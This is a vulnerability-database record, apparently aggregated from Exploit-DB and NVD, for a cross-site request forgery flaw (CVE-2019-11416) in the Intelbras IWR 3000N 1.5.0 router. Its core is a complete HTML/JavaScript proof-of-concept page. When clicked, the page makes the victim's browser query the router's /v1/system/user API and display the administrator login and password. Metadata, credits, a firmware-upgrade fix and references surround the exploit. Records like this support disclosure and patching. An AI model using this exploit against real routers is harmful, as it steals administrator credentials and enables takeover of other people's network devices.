ID
VAR-E-201904-0151
CVE
| cve_id: | CVE-2019-11416 | Trust: 1.5 |
EDB ID
46770
TITLE
Intelbras IWR 3000N 1.5.0 - Cross-Site Request Forgery - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
Intelbras IWR 3000N 1.5.0 - Cross-Site Request Forgery. CVE-2019-11416 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | intelbras | model: | iwr 3000n | scope: | eq | version: | 1.5.0 | Trust: 2.1 |
EXPLOIT
<!--
PoC based on CVE-2019-11416 created by Social Engineering Neo.
Credit: https://1.337.zone/2019/04/08/intelbras-iwr-3000n-1-5-0-csrf-lead-to-router-takeover/
Due to inexistent authorization on router API on authenticated IP addresses, an attacker can use this weak spot to change router configurations and take the current administrator password.
Upgrade to latest firmware version iwr-3000n-1.8.7_0 for 3000n routers to prevent this issue.
-->
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>IWR 3000N - CSRF on authenticated administrator</title>
</head>
<body>
<button onclick="exploit()">Exploit!</button>
<p>Click the button to get the login and password.</p>
<script>
function exploit(){
$.get( "http://localhost:80/v1/system/user" )
.done(( data ) => {
alert( data );
})
.fail(function( err, status) {
alert( status );
});
}
</script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
</body>
</html>
Trust: 1.0
EXPLOIT LANGUAGE
html
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Cross-Site Request Forgery
Trust: 1.6
TAGS
| tag: | Cross-Site Request Forgery (CSRF) | Trust: 1.0 |
| tag: | exploit | Trust: 0.5 |
| tag: | proof of concept | Trust: 0.5 |
| tag: | csrf | Trust: 0.5 |
CREDITS
Social Engineering Neo
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 46770 | Trust: 1.6 |
| db: | NVD | id: | CVE-2019-11416 | Trust: 1.5 |
| db: | EDBNET | id: | 101391 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 152682 | Trust: 0.5 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2019-11416 | Trust: 1.5 |
| url: | https://www.exploit-db.com/exploits/46770/ | Trust: 0.6 |
SOURCES
| db: | PACKETSTORM | id: | 152682 |
| db: | EXPLOIT-DB | id: | 46770 |
| db: | EDBNET | id: | 101391 |
LAST UPDATE DATE
2022-07-27T09:29:33.493000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 152682 | date: | 2019-04-30T16:08:32 |
| db: | EXPLOIT-DB | id: | 46770 | date: | 2019-04-30T00:00:00 |
| db: | EDBNET | id: | 101391 | date: | 2019-04-30T00:00:00 |